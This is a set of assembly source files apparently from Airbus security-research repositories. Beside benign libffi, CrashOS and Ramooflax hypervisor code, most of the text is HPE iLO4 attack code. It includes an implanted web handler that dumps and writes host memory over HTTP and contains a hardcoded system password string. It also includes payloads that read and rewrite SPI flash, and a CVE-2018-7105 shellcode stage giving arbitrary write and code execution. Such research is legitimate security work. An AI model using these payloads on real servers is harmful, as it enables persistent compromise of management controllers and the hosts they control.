movsd ffi_clo_OFF_R(%rsp), %xmm0
addq $ffi_clo_FS, %rsp
cfi_adjust_cfa_offset(-ffi_clo_FS)
ret
cfi_endproc
SEH(.seh_endproc)
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
airbus-seclab/crashos
| 2,812
|
src/core/interrupt_wrapper.s
|
# This file is part of CrashOS and is released under GPLv2 (see crashos/LICENSE.md)
# Copyright Airbus Group
.file "interrupt_wrapper.s"
/* Code section */
.text
.globl idt_switch
.type idt_switch,"function"
/* Array defined and init interrupt_handler.c/init_handler_array()*/
.extern interrupt_handlers
generic_handle:
/* Save registers */
pusha
push %ss
push %ds
push %es
push %fs
push %gs
/* Prepare argument context_t* */
mov %esp, %eax
/* Get the interrupt number */
mov 52(%esp), %ebx
/* Restore default DS to access interrupt_handler array */
mov $0x10, %ecx
movw %cx, %ds // WARNING : suppose that GDTR is correctly configured !!
/* Call the right handler */
lea interrupt_handlers, %edi
call *(%edi,%ebx,4)
pop %gs
pop %fs
pop %es
pop %ds
pop %ss
popa
add $8, %esp
iret
.align 16
idt_switch:
/* 0 #DE : Divide Error Exception N */
push $-1 /* fake error code */
push $0 /* Exception number */
jmp generic_handle
.align 16
/* 1 #DB : Debug Exception N */
push $-1
push $1
jmp generic_handle
.align 16
/* 2 NMI Interrupt N */
push $-1
push $2
jmp generic_handle
.align 16
/* 3 #BP : Breakpoint Exception N */
push $-1
push $3
jmp generic_handle
.align 16
/* 4 #OF : Overflow Exception N */
push $-1
push $4
jmp generic_handle
.align 16
/* 5 #BR : Bound Range exceeded exception N */
push $-1
push $5
jmp generic_handle
.align 16
/* 6 #UD : Invalid Opcode Exception N */
push $-1
push $6
jmp generic_handle
.align 16
/* 7 #NM : Device Not Available Exception N */
push $-1
push $7
jmp generic_handle
.align 16
/* 8 #DF : Double Fault Exception Y */
push $8
jmp generic_handle
.align 16
/* 9 Coprocessor Segment Overrun N */
push $-1
push $9
jmp generic_handle
.align 16
/* 10 #TS : Invalid TSS Exception Y */
push $10
jmp generic_handle
.align 16
/* 11 #NP : Segment Not Present Y */
push $11
jmp generic_handle
.align 16
/* 12 #SS : Stack Fault Exception Y */
push $12
jmp generic_handle
.align 16
/* 13 #GP : General Protection Exception Y */
push $13
jmp generic_handle
.align 16
/* 14 #PF : Page Fault Exception Y */
push $14
jmp generic_handle
.align 16
/* 15 Reserved for Intel N */
push $-1
push $15
jmp generic_handle
.align 16
/* 16 #MF : x87 FPU Floating-Point Error N */
push $-1
push $16
jmp generic_handle
.align 16
/* 17 #AC : Alignment Check Exception Y */
push $17
jmp generic_handle
.align 16
/* 18 #MC : Machine-Check Exception N */
push $-1
push $18
jmp generic_handle
.align 16
/* 19 #XF : SIMD Floating-Point Exception N */
push $-1
push $19
jmp generic_handle
.align 16
|
airbus-seclab/ilo4_toolbox
| 12,288
|
scripts/iLO4/GET_handler.S
|
start:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R7, R2
MOV R6, R3
MOV R1, #0x400
MOV R0, SP
BL bzero
MOV R0, #8
BL memmap
MOV R0, R7
LDR R10, get_query_string
BLX R10
CMP R0, #0
BEQ error_400
MOV R2, #0x1000
MOV R1, R0
BL get_storage
ADD R0, R0, #0x2000
STR R0, [SP,#0xFC]
LDR R10, strncpy
BLX R10
parsing:
MOV R2, #0xE0
STR R2, [SP,#0]
ADD R3, SP, #0x220
MOV R2, #0x20
ADD R1, SP, #0x200
LDR R0, [SP,#0xFC]
BL parse_qs
STR R0, [SP,#0xFC]
LDR R1, string_act
LDR R0, [SP, #0x200]
CMP R0, R1
BNE unknown_cmd
LDR R1, string_dmp
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_dmp
LDR R1, string_ldmp
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_ldmp
LDR R1, string_wmem
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_wmem
B unknown_cmd
cmd_dmp:
BL check_host
CMP R0, #1
BNE host_down
LDR R1, [SP,#0xFC]
MOV R0, R6
BL dmp
CMP R0, #1
BEQ error_cmd
B end
cmd_ldmp:
LDR R1, [SP,#0xFC]
MOV R0, R6
BL ldmp
CMP R0, #1
BEQ error_cmd
B end
cmd_wmem:
BL check_host
CMP R0, #1
BNE host_down
LDR R1, [SP,#0xFC]
MOV R0, R6
BL wmem
CMP R0, #1
BEQ error_cmd
B end
host_down:
MOV R2, #0xF
ADR R1, string_hostdown
MOV R0, R6
BL go_200
B end
error_cmd:
MOV R2, #0x10
ADR R1, string_errcmd
MOV R0, R6
BL go_200
B end
unknown_cmd:
MOV R2, #0xF
ADR R1, string_unkcmd
MOV R0, R6
BL go_200
B end
error_400:
MOV R0, R6
BL go_400
end:
LDMDB R11, {R5-R11,SP,PC}
get_query_string: .word 0x17AD8
strncpy: .word 0x17B26C0
bzero:
LDR R10, bzero_fn
BX R10
bzero_fn: .word 0x1782FE4
string_act: .string "act"
.align 4
string_dmp: .string "dmp"
.align 4
string_ldmp: .string "ldmp"
.align 4
string_wmem: .string "wmem"
.align 4
string_cmdin: .string "cmdin"
.align 4
string_cmdout: .string "cmdout"
.align 4
string_unkcmd: .string "Unknown command"
.align 4
string_errcmd: .string "Error in command"
.align 4
string_hostdown: .string "Host not ready!"
.align 4
parse_qs:
LDR R10, parse_query_string
BX R10
parse_query_string: .word 0x6D100
go_200_headers:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R6, R0
LDR R1, off_http_code
LDR R2, http_code_200
STR R2, [R1,R6]
MOV R0, R6
LDR R10, send_headers
BLX R10
LDMDB R11, {R5-R11,SP,PC}
go_200_close:
LDR R10, close_conn
BX R10
go_200_send:
LDR R10, send_content
BX R10
go_200:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x10
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R0, R6
BL go_200_headers
MOV R2, R8
MOV R1, R7
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
go_400:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R6, R0
LDR R1, off_http_code
LDR R2, http_code_400
STR R2, [R1,R6]
MOV R0, R6
LDR R10, send_empty_content
BLX R10
LDMDB R11, {R5-R11,SP,PC}
send_content: .word 0x16D90
send_headers: .word 0x16BBC
close_conn: .word 0x16DBC
send_empty_content: .word 0x16A2C
off_http_code: .word 0x2420
http_code_200: .word 200
http_code_400: .word 400
dmp:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R6, R0
MOV R7, R1
MOV R1, #0x400
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]
dmp_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_ploop
MOV R2, #0xE0
STR R2, [SP,#0]
ADD R3, SP, #0x220
MOV R2, #0x20
ADD R1, SP, #0x200
BL parse_qs
STR R0, [SP,#0xFC]
BL get_addrhistr
LDR R1, [SP, #0x200]
CMP R0, R1
BEQ get_addrhi
BL get_addrlostr
CMP R0, R1
BEQ get_addrlo
BL get_countstr
CMP R0, R1
BNE end_ploop
get_count:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF0]
B dmp_ploop
get_addrhi:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF8]
B dmp_ploop
get_addrlo:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF4]
B dmp_ploop
end_ploop:
LDR R0, [SP, #0xF8]
CMP R0, #0
BNE check_size
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_dmp
check_size:
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_dmp
BL get_mask
AND R0, R0, R1
CMP R0, #0
BNE err_dmp
do_dmp:
LDR R3, [SP, #0xF0]
LDR R2, [SP, #0xF8]
LDR R1, [SP, #0xF4]
MOV R0, R6
BL dmp_host
MOV R0, #0
B end_dmp
err_dmp:
MOV R0, #1
end_dmp:
LDMDB R11, {R5-R11,SP,PC}
ldmp:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R6, R0
MOV R7, R1
MOV R1, #0x400
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]
ldmp_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_ldmp_ploop
MOV R2, #0xE0
STR R2, [SP,#0]
ADD R3, SP, #0x220
MOV R2, #0x20
ADD R1, SP, #0x200
BL parse_qs
STR R0, [SP,#0xFC]
LDR R1, [SP, #0x200]
BL get_addrlostr
CMP R0, R1
BEQ get_ldmp_addrlo
BL get_countstr
CMP R0, R1
BNE end_ldmp_ploop
get_ldmp_count:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF0]
B ldmp_ploop
get_ldmp_addrlo:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF4]
B ldmp_ploop
end_ldmp_ploop:
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_ldmp
ldmp_check_size:
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_ldmp
do_ldmp:
MOV R0, R6
BL go_200_headers
LDR R2, [SP, #0xF0]
LDR R1, [SP, #0xF4]
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
MOV R0, #0
B end_ldmp
err_ldmp:
MOV R0, #1
end_ldmp:
LDMDB R11, {R5-R11,SP,PC}
wmem:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x200
MOV R6, R0
MOV R7, R1
MOV R1, #0x200
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]
wmem_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_wmemploop
MOV R2, #0x1000
STR R2, [SP,#0]
BL get_storage
MOV R3, R0
MOV R2, #0x20
ADD R1, SP, #0x100
LDR R0, [SP,#0xFC]
BL parse_qs
STR R0, [SP,#0xFC]
BL get_addrhistr
LDR R1, [SP, #0x100]
CMP R0, R1
BEQ get_wmem_addrhi
BL get_addrlostr
CMP R0, R1
BEQ get_wmem_addrlo
BL get_datastr
CMP R0, R1
BNE end_wmemploop
get_data:
MOV R2, #0x1000
BL get_storage
ADD R1, R0, #0x1000
BL b64_decode
STR R0, [SP, #0xF0]
B wmem_ploop
get_wmem_addrhi:
BL get_storage
BL atoi16
STR R0, [SP, #0xF8]
B wmem_ploop
get_wmem_addrlo:
BL get_storage
BL atoi16
STR R0, [SP, #0xF4]
B wmem_ploop
end_wmemploop:
LDR R0, [SP, #0xF8]
CMP R0, #0
BNE check_wmem_size
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_wmem
check_wmem_size:
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_wmem
CMP R1, #0xffffffff
BEQ err_wmem
do_wmem:
LDR R3, [SP, #0xF0]
LDR R2, [SP, #0xF8]
LDR R1, [SP, #0xF4]
MOV R0, R6
BL wmem_host
MOV R0, #0
B end_wmem
err_wmem:
MOV R0, #1
end_wmem:
LDMDB R11, {R5-R11,SP,PC}
get_addrhistr:
LDR R0, string_addrhi
BX LR
string_addrhi: .string "hiaddr"
.align 4
get_addrlostr:
LDR R0, string_addrlo
BX LR
string_addrlo: .string "loaddr"
.align 4
get_countstr:
LDR R0, string_count
BX LR
string_count: .string "count"
.align 4
get_datastr:
LDR R0, string_data
BX LR
string_data: .string "data"
.align 4
get_mask:
LDR R0, ffff
BX LR
ffff: .word 0xffff
atoi16:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R2, #0x10
MOV R1, #0
LDR R10, strtoll
BLX R10
LDMDB R11, {R5-R11,SP,PC}
strtoll: .word 0x17B91F8
dmp_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x100
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R9, R3
MOV R1, #0x100
MOV R0, SP
BL bzero
BL get_passwd
MOV R2, R0
BL get_mr
MOV R1, R0
MOV R0, SP
BL RequestResource
ADD R2, SP, #0x8
ADD R1, SP, #0x4
LDR R0, [SP]
BL GetMemoryRegionAddresses
MOV R2, #0
BL get_saw
MOV R1, R0
ADD R0, SP, #0x10
BL RequestResource
MOV R0, R6
BL go_200_headers
LDR R0, [SP, #0x10]
MOV R2, #0
MOV R1, R2
BL WaitForSemaphore
MOV R0, #2
STR R0, [SP, #0x14]
dmp_host_loop:
MOV R3, R8, LSL #8
ORR R2, R3, R7, LSR #24
LDRB R3, [SP, #0x14]
BIC R2, R2, #0xFF000000
ORR R2, R2, R3, LSL #24
BL get_pcireg
STR R2, [R0]
BIC R2, R7, #0xFF000000
ADD R0, R2, #0x81000000
STR R0, [SP, #0xC]
MOV R3, #0x10000
BL get_storage
MOV R2, R0
LDR R1, [SP, #0xC]
LDR R0, [SP]
BL CopyFromMemoryRegion
MOV R2, #0x10000
BL get_storage
MOV R1, R0
MOV R0, R6
BL go_200_send
SUBS R9, R9, #0x10000
CMP R9, #0
BLE dmp_host_end
ADD R7, R7, #0x10000
B dmp_host_loop
dmp_host_end:
LDR R0, [SP, #0x10]
BL ReleaseSemaphore
LDR R0, [SP, #0x10]
BL ReleaseResource
LDR R0, [SP]
BL ReleaseResource
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
wmem_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x100
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R9, R3
MOV R1, #0x100
MOV R0, SP
BL bzero
BL get_passwd
MOV R2, R0
BL get_mr
MOV R1, R0
MOV R0, SP
BL RequestResource
ADD R2, SP, #0x8
ADD R1, SP, #0x4
LDR R0, [SP]
BL GetMemoryRegionAddresses
MOV R2, #0
BL get_saw
MOV R1, R0
ADD R0, SP, #0x10
BL RequestResource
LDR R0, [SP, #0x10]
MOV R2, #0
MOV R1, R2
BL WaitForSemaphore
MOV R0, #2
STR R0, [SP, #0x14]
MOV R3, R8, LSL #8
ORR R2, R3, R7, LSR #24
LDRB R3, [SP, #0x14]
BIC R2, R2, #0xFF000000
ORR R2, R2, R3, LSL #24
BL get_pcireg
STR R2, [R0]
BIC R2, R7, #0xFF000000
ADD R0, R2, #0x81000000
STR R0, [SP, #0xC]
MOV R3, R9
BL get_storage
ADD R2, R0, #0x1000
LDR R1, [SP, #0xC]
LDR R0, [SP]
BL CopyToMemoryRegion
LDR R0, [SP, #0x10]
BL ReleaseSemaphore
LDR R0, [SP, #0x10]
BL ReleaseResource
LDR R0, [SP]
BL ReleaseResource
MOV R0, R6
BL go_200_headers
MOV R2, R9
BL get_storage
ADD R1, R0, #0x1000
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
check_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
LDR R2, host_pcireg
LDR R1, [R2]
ANDS R0, R1, #0x1000000
BEQ check_host_end
TST R1, #0x2000000
MOVNE R0, #0xFFFFFFFF
MOVEQ R0, #1
check_host_end:
LDMDB R11, {R5-R11,SP,PC}
host_pcireg: .word 0x1F02070
get_pcireg:
LDR R0, pcireg
BX LR
pcireg: .word 0x1F02060
RequestResource:
LDR R10, RequestResource_fn
BX R10
RequestResource_fn: .word 0x17A3948
ReleaseResource:
LDR R10, ReleaseResource_fn
BX R10
ReleaseResource_fn: .word 0x17808FC
WaitForSemaphore:
LDR R10, WaitForSemaphore_fn
BX R10
WaitForSemaphore_fn: .word 0x1781190
ReleaseSemaphore:
LDR R10, ReleaseSemaphore_fn
BX R10
ReleaseSemaphore_fn: .word 0x1781B54
GetMemoryRegionAddresses:
LDR R10, GetMemoryRegionAddresses_fn
BX R10
GetMemoryRegionAddresses_fn: .word 0x17829A0
CopyFromMemoryRegion:
LDR R10, CopyFromMemoryRegion_fn
BX R10
CopyFromMemoryRegion_fn: .word 0x178284C
CopyToMemoryRegion:
LDR R10, CopyToMemoryRegion_fn
BX R10
CopyToMemoryRegion_fn: .word 0x1782818
memmap:
LDR R10, memmap_fn
BX R10
memmap_fn: .word 0x49718
b64_decode:
LDR R10, b64_decode_fn
BX R10
b64_decode_fn: .word 0x1C250F8
get_mr:
ADR R0, mr
BX LR
mr: .string "MR81000"
.align 4
get_saw:
ADR R0, saw
BX LR
saw: .string "SAWBASE"
.align 4
get_passwd:
ADR R0, passwd
BX LR
passwd: .string "!systempassword"
.align 4
get_storage:
LDR R0, storage
BX LR
storage: .word 0x2f1934
|
airbus-seclab/ilo4_toolbox
| 2,343
|
scripts/iLO4/exploits/flash_write_page.S
|
start:
PUSH {R5,R6,R8,LR}
SUB SP, SP, #4
LDR R0, wbuff
LDR R1, rdy
STR R1, [R0]
LDR R3, SSL_Write
MOV R2, #0x4
LDR R1, wbuff
MOV R0, R7
BLX R3
MOV R8, #0
do_page:
MOV R6, #0
get_data:
LDR R3, SSL_Read
LDR R2, page_size
LDR R1, wbuff
MOV R5, #0x1000
ADD R1, R5
ADD R1, R6
MOV R0, R7
BLX R3
ADD R6, R0
LDR R1, wbuff
STR R0, [R1]
LDR R3, SSL_Write
MOV R2, #0x8
LDR R1, wbuff
MOV R0, R7
BLX R3
LDR R0, page_size
CMP R6, R0
BNE get_data
erase:
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
ADD R0, R8
STR R0, [R3]
MOV R1, #0
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #0
STRB R2, [R3, #3]
MOV R2, #0xD8
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
MOV R0, #1
STRB R0, [R3, #0x111]
LDR R5, VComClientSync_Call
MOV R1, R3
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5
MOV R6, #0
wloop:
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
ADD R0, R6
ADD R0, R8
STR R0, [R3]
MOV R1, #0x100
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #0
STRB R2, [R3, #3]
MOV R2, #0x2
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
MOV R0, #1
STRB R0, [R3, #0x111]
MOV R5, R3
MOV R2, #0x100
LDR R1, wbuff
MOV R3, #0x1000
ADD R1, R3
ADD R1, R6
MOV R0, R5
ADD R0, #8
ADD R0, #5
LDR R3, memcpy
BLX R3
MOV R1, R5
LDR R5, VComClientSync_Call
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5
ADD R6, #0x100
LDR R0, page_size
CMP R6, R0
BNE wloop
LDR R0, page_size
ADD R8, R0
LDR R0, memcount
CMP R8, R0
BNE do_page
theend:
LDR R0, wbuff
LDR R1, eot
STR R1, [R0]
LDR R3, SSL_Write
MOV R2, #0x8
LDR R1, wbuff
MOV R0, R7
BLX R3
ADD SP, SP, #4
MOV R0, -257
POP {R5,R6,R8,LR}
BX LR
wbuff: .word 0x%x
SSL_Write: .word 0x%x
SSL_Read: .word 0x%x
wsize: .word 0x818
off: .word 0x408
insz: .word 0x114
addr: .word 0x%x
memcount: .word 0x%x
chip: .word 0x%x
VComClientSync_Call: .word 0x%x
memcpy: .word 0x%x
page_size: .word 0x10000
svc_name: .string "SpiService"
.align
eot: .string "EOT"
.align
rdy: .string "RDY"
.align
final: .word 0x41414141
|
airbus-seclab/ilo4_toolbox
| 1,182
|
scripts/iLO4/exploits/flash_read.S
|
start:
PUSH {R5,R6,LR}
SUB SP, SP, #4
loop:
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
STR R0, [R3]
MOV R1, #0x400
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #1
STRB R2, [R3, #3]
MOV R2, #0xB
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
STRB R0, [R3, #0x111]
MOV R6, R3
LDR R5, VComClientSync_Call
MOV R1, R6
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5
LDR R3, SSL_Write
LDR R2, wsize
LDR R1, wbuff
MOV R0, R7
BLX R3
LDR R0, addr
ADD R0, #0x400
ADR R1, addr
STR R0, [R1]
LDR R0, memcount
SUB R0, #0x400
ADR R1, memcount
STR R0, [R1]
CMP R0, #0
BNE loop
theend:
LDR R0, wbuff
LDR R1, eot
STR R1, [R0]
LDR R3, SSL_Write
MOV R2, #0x4
LDR R1, wbuff
MOV R0, R7
BLX R3
ADD SP, SP, #4
MOV R0, -257
POP {R5,R6,LR}
BX LR
wbuff: .word 0x%x
SSL_Write: .word 0x%x
wsize: .word 0x818
off: .word 0x408
insz: .word 0x114
addr: .word 0x%x
memcount: .word 0x%x
chip: .word 0x%x
VComClientSync_Call: .word 0x%x
svc_name: .string "SpiService"
.align
eot: .string "EOT"
.align
final: .word 0x41414141
|
airbus-seclab/ilo4_toolbox
| 4,432
|
scripts/iLO4/exploits/payloads_for_cli/stage1.S
|
/* Stage 1 payload written in ConAppCLI memory using CVE-2018-7105
* Only 216 bytes per "segment" are allowed, from 0x28, to prevent 0x25 from
* being in an address (chr(0x25) = '%')
*
* Compile in a standalone fashion using:
arm-none-eabi-gcc -march=armv5 -c -fPIC -nostdlib -ffreestanding stage1.S -o stage1_ilo4_250.o \
-DADDR_get_CLI_session_ptr=0x21e24 \
-DADDR_CLI_printf=0x12f50 \
-DADDR_libc_malloc=0x17B85E8 \
-DADDR_libc_free=0x17B86F4
arm-none-eabi-objcopy -j .shcode -O binary stage1_ilo4_250.o stage1_ilo4_250.bin
*/
.section .shcode, "ax", %progbits
.arm
.align 2
/* Use 256-byte segments, with 26..ff in each segment
* They are the onlly valid addresses
* And in fact use 0x28 to keep 4-byte alignment
*/
FIRST_SEGMENT:
.zero 0x28
_start:
/* In ARM asm, fp=r11, ip=r12 */
mov ip, sp
push {r5, r6, r7, r8, r9, r10, fp, ip, lr, pc}
sub fp, ip, #4 /* fp = pointer to saved pc */
mov r6, r0 /* save arg0 = CLI session ID */
ldr r7, [pc, #(get_CLI_session_ptr - . - 8)]
blx r7
mov r5, r0
/* From now on, on iLO 4 v2.50:
* - r4 = Thread-Local structure for glibc
* - r5 = Pointer to CLI Session info
* offset 0x164 = array of 16 arguments, 256 chars each
* 0x164..263 = CLI command name
* 0x264..363 = first arg
* 0x364..464 = second arg
* ...
* 0x1064..1163 = last arg
* offset 0x1164 = u32 number of arguments
* - r6 = ID of CLI Session
* - r7 = temp register for function address
*/
/* Decode the integer in args[1][1:] into r8 using base16 with alphabet 'ABCDEFGHIJKLMNOP' */
mov r8, #0
add r1, r5, #0x264 /* pointer to 1sr char of first arg, which is skipped */
_addr_loop:
ldrb r2, [r1, #1]!
sub r2, r2, #0x41
cmp r2, #0x10
lsllo r8, r8, #4
addlo r8, r8, r2
blo _addr_loop
/* Load first char of args[1] */
ldrb r0, [r5, #0x264]
cmp r0, #0x61 /* a */
beq cmd_alloc
cmp r0, #0x66 /* f */
beq cmd_free
cmp r0, #0x77 /* w */
beq cmd_write
cmp r0, #0x78 /* x */
beq cmd_execute
/* Default command */
mov r3, r8
add r2, r5, #0x264
adr r1, _message
mov r0, r6
ldr r7, CLI_printf
blx r7
return:
ldmdb fp, {r5, r6, r7, r8, r9, r10, fp, sp, pc}
cmd_write:
/* Syntax: wADDR CONTENT
* Write the memory at the given address
* regs:
* r1 = ptr to arg
* r2 = cur char
* r3 = cur byte
* r8 = destination address
*/
add r1, r5, #0x364
_cmdw_data_loop:
ldrb r2, [r1], #1
sub r2, r2, #0x41
cmp r2, #0x10
bhs return /* return if end of data */
lsl r3, r2, #4
ldrb r2, [r1], #1
sub r2, r2, #0x41
cmp r2, #0x10
bhs return /* return if end of data */
add r3, r3, r2
/* debug */
push {r0, r1, r2, r3}
mov r2, r8
adr r1, _cmdw_addr_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
pop {r0, r1, r2, r3}
strb r3, [r8], #1
b _cmdw_data_loop
/* new segment */
.zero 256 - (. - FIRST_SEGMENT)
SECOND_SEGMENT:
.zero 0x28
cmd_alloc:
/* Syntax: aSIZE
* Allocate memory of the given size and prints its address
* regs:
* r7 = malloc
* r8 = destination address
*/
mov r0, r8
ldr r7, libc_malloc
blx r7
/* Show the result, in range 0xea000..0xfa000 */
mov r2, r0
adr r1, _cmda_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
b return
cmd_free:
/* Syntax: fADDR
* Free the memory at the given address
*/
mov r2, r8
adr r1, _cmdf_fmt
mov r0, r6
ldr r7, CLI_printf
blx r7
mov r0, r8
ldr r7, libc_free
blx r7
b return
cmd_execute:
/* Syntax: xADDR
* Execute the code at the given address
*/
mov r1, r5
mov r0, r6
blx r8
b return
/* get_CLI_session_ptr, useful to get arguments */
get_CLI_session_ptr:
.word ADDR_get_CLI_session_ptr
CLI_printf:
.word ADDR_CLI_printf
libc_malloc:
.word ADDR_libc_malloc
libc_free:
.word ADDR_libc_free
_message:
.ascii "arg[1]=%.256s, r8=%#x\r\n\0"
_cmdw_addr_fmt:
.ascii "%#x <- %#x\r\n\0"
.align 2
_cmda_fmt:
.ascii "alloc %#x\r\n\0"
_cmdf_fmt:
.ascii "free %#x\r\n\0"
|
airbus-seclab/ramooflax
| 1,123
|
loader/src/core/entry.s
|
/*
** Copyright (C) 2016 Airbus Group, stephane duverger <stephane.duverger@airbus.com>
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License along
** with this program; if not, write to the Free Software Foundation, Inc.,
** 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
.text
.globl entry
.type entry,"function"
/*
** - make us uninterruptible
** - set initial stack for loader
** - clear eflags
** - init loader with grub multiboot info
*/
entry:
cli
movl $__kernel_start__, %esp
pushl $0
popf
movl %ebx, %eax
jmp init
|
airbus-seclab/ramooflax
| 3,793
|
setup/src/vmx/vmx_insn.s
|
/*
** Copyright (C) 2016 Airbus Group, stephane duverger <stephane.duverger@airbus.com>
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License along
** with this program; if not, write to the Free Software Foundation, Inc.,
** 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
.text
.globl __vmx_vmwrite
.type __vmx_vmwrite,"function"
.globl __vmx_vmread
.type __vmx_vmread,"function"
.globl __vmx_vmclear
.type __vmx_vmclear,"function"
.globl __vmx_vmload
.type __vmx_vmload,"function"
.globl __vmx_vmxon
.type __vmx_vmxon,"function"
.globl vmx_vmlaunch
.type vmx_vmlaunch,"function"
/*
** VM-entry
*/
vmx_vmlaunch:
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %r9
popq %r8
popq %rdi
popq %rsi
popq %rbp
addq $8, %rsp
popq %rbx
popq %rdx
popq %rcx
popq %rax
vmlaunch
/*
** VM-entry failure
**
** rsp + 32 [ vmx_err ]
** rsp + 24 [ format str ]
** rsp + 16 [ func name ]
** rsp + 8 [ fake_ret @ ]
** rsp + 0 [ panic @ ]
**
** Params:
** RDI = mem64 VMX error code ptr = @vmx_err
*/
vmx_vmlaunch_failure:
mov %rsp, %rdi
push $vmx_vmlaunch_failure_fmt
push $vmx_vmlaunch_failure_fnm
push $0xbadc0de
push $__panic
jmp vmx_check_error
/*
** Enter VMX root operations
**
** params:
** RDI = mem64 VMXON region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmxon:
vmxon (%rdi)
jc vmx_fail
jmp vmx_success
/*
** Clear VMCS
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 VMCS region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmclear:
vmclear (%rsi)
jmp vmx_check_error
/*
** Load VMCS
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 VMCS region paddr
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmload:
vmptrld (%rsi)
jmp vmx_check_error
/*
** VM write
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = value to write
** RDX = VMCS field encoding
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmwrite:
vmwrite %rsi, %rdx
jmp vmx_check_error
/*
** VM read
**
** params:
** RDI = mem64 VMX error code ptr
** RSI = mem64 read value ptr
** RDX = VMCS field encoding
**
** returns:
** 0 on failure
** 1 on success
*/
__vmx_vmread:
